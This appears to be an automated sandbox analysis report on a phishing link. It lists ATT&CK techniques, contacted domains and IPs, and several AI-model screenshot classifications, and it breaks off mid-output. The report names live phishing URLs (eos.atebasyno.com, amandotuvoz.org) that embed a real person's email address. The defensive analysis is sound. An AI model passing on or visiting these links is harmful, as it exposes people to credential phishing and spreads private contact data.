    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.1.229
    truefalse
      unknown
      dart.l.doubleclick.net
      142.250.186.38
      truefalse
        unknown
        fastly-tls12-bam.nr-data.net
        162.247.243.29
        truefalse
          unknown
          cdn.evgnet.com
          151.101.128.114
          truefalse
            unknown
            csm.nl3.vip.prod.criteo.net
            178.250.1.25
            truefalse
              unknown
              shops.myshopify.com
              23.227.38.74
              truefalse
                unknown
                adservice.google.com
                142.250.184.226
                truefalse
                  unknown
                  fledge.us5.vip.prod.criteo.com
                  74.119.117.20
                  truefalse
                    unknown
                    platform.twitter.map.fastly.net
                    146.75.88.157
                    truefalse
                      unknown
                      display.powerreviews.com
                      18.245.86.4
                      truefalse
                        unknown
                        dynamic.nl3.vip.prod.criteo.com
                        178.250.1.13
                        truefalse
                          unknown
                          t.co
                          172.66.0.227
                          truefalse
                            unknown
                            code.jquery.com
                            151.101.194.137
                            truefalse
                              unknown
                              gw-monorail-production-gateway-apps-a-us-ce1-xi5.shopifycloud.com
                              34.54.30.0
                              truefalse
                                unknown
                                widget.nl3.vip.prod.criteo.com
                                178.250.1.9
                                truefalse
                                  unknown
                                  www.google.com
                                  142.250.185.132
                                  truefalse
                                    unknown
                                    eos.atebasyno.com
                                    104.21.19.232
                                    truefalse
                                      unknown
                                      api.tapc.art
                                      104.22.38.67
                                      truefalse
                                        unknown
                                        star-mini.c10r.facebook.com
                                        157.240.0.35
                                        truefalse
                                          unknown
                                          a.nel.cloudflare.com
                                          35.190.80.1
                                          truefalse
                                            unknown
                                            websdk.appsflyer.com
                                            18.245.60.28
                                            truefalse
                                              unknown
                                              s.twitter.com
                                              104.244.42.131
                                              truefalse
                                                unknown
                                                ad.doubleclick.net
                                                142.250.185.230
                                                truefalse
                                                  unknown
                                                  js-agent.newrelic.com
                                                  162.247.243.39
                                                  truefalse
                                                    unknown
                                                    s-part-0017.t-0009.t-msedge.net
                                                    13.107.246.45
                                                    truefalse
                                                      unknown
                                                      fonts.shopifycdn.com
                                                      185.146.173.20
                                                      truefalse
                                                        unknown
                                                        g28hawu9.micpn.com
                                                        18.244.18.74
                                                        truefalse
                                                          unknown
                                                          d1kjqklgpia5go.cloudfront.net
                                                          18.239.83.123
                                                          truefalse
                                                            unknown
                                                            cdn.shopify.com
                                                            23.227.60.200
                                                            truefalse
                                                              unknown
                                                              ax-0001.ax-msedge.net
                                                              150.171.27.10
                                                              truefalse
                                                                unknown
                                                                featureassets.org
                                                                34.128.128.0
                                                                truefalse
                                                                  unknown
                                                                  amandotuvoz.org
                                                                  192.185.85.251
                                                                  truefalse
                                                                    unknown
                                                                    shop.app
                                                                    185.146.173.20
                                                                    truefalse
                                                                      unknown
                                                                      prod.pinterest.global.map.fastly.net
                                                                      151.101.128.84
                                                                      truefalse
                                                                        unknown
                                                                        r4.cloud.yellow.ai
                                                                        104.18.7.105
                                                                        truefalse
                                                                          unknown
                                                                          prod6-tomcat-1798224778.us-east-1.elb.amazonaws.com
                                                                          54.161.63.113
                                                                          truefalse
                                                                            unknown
                                                                            googleads.g.doubleclick.net
                                                                            142.250.185.226
                                                                            truefalse
                                                                              unknown
                                                                              gum.nl3.vip.prod.criteo.com
                                                                              178.250.1.11
                                                                              truefalse
                                                                                unknown
                                                                                prodregistryv2.org
                                                                                34.128.128.0
                                                                                truefalse
                                                                                  unknown
                                                                                  js.appboycdn.com
                                                                                  104.16.119.9
                                                                                  truefalse
                                                                                    unknown
                                                                                    cdn.tapcart.com
                                                                                    35.227.237.110
                                                                                    truefalse
                                                                                      unknown
                                                                                      td.doubleclick.net
                                                                                      216.58.206.66
                                                                                      truefalse
                                                                                        unknown
                                                                                        www.google.com.sg
                                                                                        142.250.185.195
                                                                                        truefalse
                                                                                          unknown
                                                                                          unpkg.com
                                                                                          104.17.248.203
                                                                                          truefalse
                                                                                            unknown
                                                                                            widget.us5.vip.prod.criteo.com
                                                                                            74.119.117.16
                                                                                            truefalse
                                                                                              unknown
                                                                                              static.ads-twitter.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                monorail-edge.shopifysvc.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  sdk.iad-03.braze.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    unknown
                                                                                                    dynamic.criteo.com
                                                                                                    unknown
                                                                                                    unknownfalse
                                                                                                      unknown
                                                                                                      use.fontawesome.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        unknown
                                                                                                        sslwidget.criteo.com
                                                                                                        unknown
                                                                                                        unknownfalse
                                                                                                          unknown
                                                                                                          14698185.fls.doubleclick.net
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            unknown
                                                                                                            widget.us.criteo.com
                                                                                                            unknown
                                                                                                            unknownfalse
                                                                                                              unknown
                                                                                                              c.clarity.ms
                                                                                                              unknown
                                                                                                              unknownfalse
                                                                                                                unknown
                                                                                                                zm47h9gj5wnqky63rbjxtzx4nhyzm0dwkri3ti1it6t9wdpl6b2atejwk.mbutzm47h9gj5wnqky63rbjxtzx4nhyzm0dwkri3ti1it6t9wdpl6b2atejwk.ru
                                                                                                                unknown
                                                                                                                unknownfalse
                                                                                                                  unknown
                                                                                                                  api.overstock.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    unknown
                                                                                                                    bam.nr-data.net
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      ak1.ostkcdn.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        ui.powerreviews.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          assets.tapcart.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            c556855555573h9jz3n3n3p091552376.us-6.evergage.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              cdn.jsdelivr.net
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                ct.pinterest.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  csm.nl3.eu.criteo.net
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    gum.criteo.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      www.facebook.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        www.clarity.ms
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          analytics.twitter.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            u.clarity.ms
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              fledge.us.criteo.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                www.overstock.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                                                                  https://www.overstock.com/false
                                                                                                                                                    unknown
                                                                                                                                                    https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.comtrue
                                                                                                                                                      unknown
                                                                                                                                                      http://amandotuvoz.org/service/jkbhwfdhjkng/frederic.delesalle@treezor.comfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://amandotuvoz.org/favicon.icofalse
                                                                                                                                                          unknown
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          142.250.186.68
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.74.202
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          151.101.0.84
                                                                                                                                                          unknownUnited States
                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                          18.239.83.123
                                                                                                                                                          d1kjqklgpia5go.cloudfront.netUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          104.18.187.31
                                                                                                                                                          unknownUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          4.227.249.197
                                                                                                                                                          unknownUnited States
                                                                                                                                                          3356LEVEL3USfalse
                                                                                                                                                          104.16.120.9
                                                                                                                                                          unknownUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          13.107.246.45
                                                                                                                                                          s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                          18.244.18.110
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          104.17.248.203
                                                                                                                                                          unpkg.comUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          142.250.185.226
                                                                                                                                                          googleads.g.doubleclick.netUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.185.227
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.185.106
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          151.101.130.137
                                                                                                                                                          unknownUnited States
                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                          151.101.128.84
                                                                                                                                                          prod.pinterest.global.map.fastly.netUnited States
                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                          178.250.1.25
                                                                                                                                                          csm.nl3.vip.prod.criteo.netFrance
                                                                                                                                                          44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                          151.101.128.114
                                                                                                                                                          cdn.evgnet.comUnited States
                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                          52.54.188.241
                                                                                                                                                          unknownUnited States
                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                          104.21.19.232
                                                                                                                                                          eos.atebasyno.comUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          142.250.184.226
                                                                                                                                                          adservice.google.comUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          35.190.80.1
                                                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.184.195
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.185.66
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          1.1.1.1
                                                                                                                                                          unknownAustralia
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          13.107.21.237
                                                                                                                                                          unknownUnited States
                                                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                          18.244.18.74
                                                                                                                                                          g28hawu9.micpn.comUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          142.250.186.38
                                                                                                                                                          dart.l.doubleclick.netUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          172.217.18.4
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          157.240.0.35
                                                                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                          104.244.42.131
                                                                                                                                                          s.twitter.comUnited States
                                                                                                                                                          13414TWITTERUSfalse
                                                                                                                                                          178.250.1.13
                                                                                                                                                          dynamic.nl3.vip.prod.criteo.comFrance
                                                                                                                                                          44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                          34.128.128.0
                                                                                                                                                          featureassets.orgUnited States
                                                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                                                          239.255.255.250
                                                                                                                                                          unknownReserved
                                                                                                                                                          unknownunknownfalse
                                                                                                                                                          142.250.185.230
                                                                                                                                                          ad.doubleclick.netUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          172.217.18.106
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          178.250.1.11
                                                                                                                                                          gum.nl3.vip.prod.criteo.comFrance
                                                                                                                                                          44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                          35.227.237.110
                                                                                                                                                          cdn.tapcart.comUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.185.195
                                                                                                                                                          www.google.com.sgUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.186.142
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.186.100
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          172.217.16.194
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          104.18.7.105
                                                                                                                                                          r4.cloud.yellow.aiUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          142.250.186.102
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.186.42
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          172.67.41.206
                                                                                                                                                          unknownUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          142.250.186.104
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          192.185.85.251
                                                                                                                                                          amandotuvoz.orgUnited States
                                                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                          18.245.60.88
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          151.101.64.114
                                                                                                                                                          unknownUnited States
                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                          172.67.142.245
                                                                                                                                                          unknownUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          142.250.186.174
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          23.227.38.74
                                                                                                                                                          shops.myshopify.comCanada
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          52.222.201.28
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          104.18.36.46
                                                                                                                                                          unknownUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          142.250.185.168
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          23.227.60.200
                                                                                                                                                          cdn.shopify.comCanada
                                                                                                                                                          62679SHOPIFYASN1CAfalse
                                                                                                                                                          142.250.181.238
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          185.146.173.20
                                                                                                                                                          fonts.shopifycdn.comSweden
                                                                                                                                                          200760ELOGIC-ASElogicSrl-CloudServicesITfalse
                                                                                                                                                          150.171.28.10
                                                                                                                                                          unknownUnited States
                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                          104.102.32.127
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                                                                          13.74.129.1
                                                                                                                                                          unknownUnited States
                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                          162.247.241.14
                                                                                                                                                          unknownUnited States
                                                                                                                                                          23467NEWRELIC-AS-1USfalse
                                                                                                                                                          151.101.194.137
                                                                                                                                                          code.jquery.comUnited States
                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                          162.247.243.39
                                                                                                                                                          js-agent.newrelic.comUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          54.161.63.113
                                                                                                                                                          prod6-tomcat-1798224778.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                          142.250.186.99
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          18.245.86.121
                                                                                                                                                          unknownUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          151.101.1.229
                                                                                                                                                          jsdelivr.map.fastly.netUnited States
                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                          178.250.1.9
                                                                                                                                                          widget.nl3.vip.prod.criteo.comFrance
                                                                                                                                                          44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                          74.119.117.16
                                                                                                                                                          widget.us5.vip.prod.criteo.comUnited States
                                                                                                                                                          19750AS-CRITEOUSfalse
                                                                                                                                                          104.22.38.67
                                                                                                                                                          api.tapc.artUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          142.250.186.163
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          172.67.10.20
                                                                                                                                                          unknownUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          216.58.206.67
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          216.58.206.66
                                                                                                                                                          td.doubleclick.netUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.185.132
                                                                                                                                                          www.google.comUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          142.250.185.138
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          216.58.206.68
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          150.171.27.10
                                                                                                                                                          ax-0001.ax-msedge.netUnited States
                                                                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                          18.245.86.4
                                                                                                                                                          display.powerreviews.comUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          18.245.60.28
                                                                                                                                                          websdk.appsflyer.comUnited States
                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                          142.250.181.228
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          162.247.243.29
                                                                                                                                                          fastly-tls12-bam.nr-data.netUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          52.23.190.202
                                                                                                                                                          unknownUnited States
                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                          64.233.184.84
                                                                                                                                                          unknownUnited States
                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                          74.119.117.20
                                                                                                                                                          fledge.us5.vip.prod.criteo.comUnited States
                                                                                                                                                          19750AS-CRITEOUSfalse
                                                                                                                                                          172.66.0.227
                                                                                                                                                          t.coUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          157.240.251.35
                                                                                                                                                          unknownUnited States
                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                          146.75.88.157
                                                                                                                                                          platform.twitter.map.fastly.netSweden
                                                                                                                                                          30051SCCGOVUSfalse
                                                                                                                                                          104.16.119.9
                                                                                                                                                          js.appboycdn.comUnited States
                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                          IP
                                                                                                                                                          192.168.2.16
                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                          Analysis ID:1537302
                                                                                                                                                          Start date and time:2024-10-18 19:22:48 +02:00
                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                          Overall analysis duration:
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                          Sample URL:https://www.google.com.sg/url?q=p8v7jruqDC0s&rct=p8v7jruqDC0s&sa=t&esrc=p8v7jruqDC0s&source=&cd=p8v7jruqDC0s&uact=&url=amp%2Famandotuvoz.org/service/jkbhwfdhjkng/frederic.delesalle@treezor.com
                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • EGA enabled
                                                                                                                                                          Analysis Mode:stream
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal52.phis.win@23/343@200/702
                                                                                                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.186.163, 64.233.184.84, 142.250.186.174, 34.104.35.123, 87.248.204.0
                                                                                                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • VT rate limit hit for: https://www.google.com.sg/url?q=p8v7jruqDC0s&rct=p8v7jruqDC0s&sa=t&esrc=p8v7jruqDC0s&source=&cd=p8v7jruqDC0s&uact=&url=amp%2Famandotuvoz.org/service/jkbhwfdhjkng/frederic.delesalle@treezor.com
                                                                                                                                                          InputOutput
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": true,
                                                                                                                                                            "trigger_text": "Running browser checks for your protection.",
                                                                                                                                                            "prominent_button_name": "unknown",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": true,
                                                                                                                                                            "trigger_text": "Running browser checks for your protection.",
                                                                                                                                                            "prominent_button_name": "unknown",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": []
                                                                                                                                                          }
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": []
                                                                                                                                                          }
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": true,
                                                                                                                                                            "trigger_text": "I'm not a robot",
                                                                                                                                                            "prominent_button_name": "I'm not a robot",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": true,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": true,
                                                                                                                                                            "trigger_text": "Almost there, one more step.",
                                                                                                                                                            "prominent_button_name": "I'm not a robot",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": true,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": []
                                                                                                                                                          }
                                                                                                                                                          URL: https://eos.atebasyno.com/Jed4ZO4/#Kfrederic.delesalle@treezor.com Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": []
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "contains_trigger_text": false,
                                                                                                                                                            "trigger_text": "unknown",
                                                                                                                                                            "prominent_button_name": "Shop Now",
                                                                                                                                                            "text_input_field_labels": "unknown",
                                                                                                                                                            "pdf_icon_visible": false,
                                                                                                                                                            "has_visible_captcha": false,
                                                                                                                                                            "has_urgent_text": false,
                                                                                                                                                            "has_visible_qrcode": false
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
                                                                                                                                                            "brands": [
                                                                                                                                                              "Beyond Inc.",
                                                                                                                                                              "Bed Bath & Beyond",
                                                                                                                                                              "Baby & Beyond",
                                                                                                                                                              "Kids & Beyond",
                                                                                                                                                              "Zulily",
                                                                                                                                                              "College Living",
                                                                                                                                                              "Studio4 Beyond",
                                                                                                                                                              "Backyard",
                                                                                                                                                              "Overstock"
                                                                                                                                                            ]
                                                                                                                                                          }
                                                                                                                                                          URL: https://www.overstock.com/ Model: claude-3-haiku-20240307
                                                                                                                                                          ```json
                                                                                                                                                          {
